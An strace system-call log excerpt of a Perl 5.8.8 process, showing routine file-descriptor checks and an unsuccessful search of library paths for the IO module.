12393 07:42:12.904065 _llseek(1, 0, [0], SEEK_CUR) = 0

12393 07:42:12.904076 fcntl64(1, F_SETFD, FD_CLOEXEC) = 0

12393 07:42:12.904087 fstat64(1, {st_mode=S_IFCHR|0666, st_rdev=makedev(1, 3), ...}) = 0

12393 07:42:12.904106 rt_sigaction(SIGCHLD, NULL, {SIG_DFL}, 8) = 0

12393 07:42:12.904159 readlink("/proc/self/exe", "/usr/bin/perl", 4095) = 13

12393 07:42:12.904249 getppid()         = 12391

12393 07:42:12.904325 stat64("/etc/perl/IO.pmc", 0xbf8975ec) = -1 ENOENT (No such file or directory)

12393 07:42:12.904339 stat64("/etc/perl/IO.pm", 0xbf8974fc) = -1 ENOENT (No such file or directory)

12393 07:42:12.904352 stat64("/usr/local/lib/perl/5.8.8/IO.pmc", 0xbf8975ec) = -1 ENOENT (No such file or directory)

12393 07:42:12.904365 stat64("/usr/local/lib/perl/5.8.8/IO.pm", 0xbf8974fc) = -1 ENOENT (No such file or directory)

12393 07:42:12.904378 stat64("/usr/local/share/perl/5.8.8/IO.pmc", 0xbf8975ec) = -1 ENOENT (No such file or directory)

12393 07:42:12.904391 stat64("/usr/local/share/perl/5.8.8/IO.pm", 0xbf8974fc) = -1 ENOENT (No such file or directory)

12393 07:42:12.904405 stat64("/usr/lib/perl5/IO.pmc", 0xbf8975ec) = -1 ENOENT (No such file or directory)

12393 07:42:12.904417 stat64("/usr/lib/perl5/IO.pm", 0xbf8974fc) = -1 ENOENT (No such file or directory)

12393 07:42:12.904430 stat64("/usr/share/perl5/IO.pmc", 0xbf8975ec) = -1 ENOENT (No such file or directory)

12393 07:42:12.904441 stat64("/usr/share/perl5/IO.pm", 0xbf8974fc) = -1 ENOENT (No such file or directory)

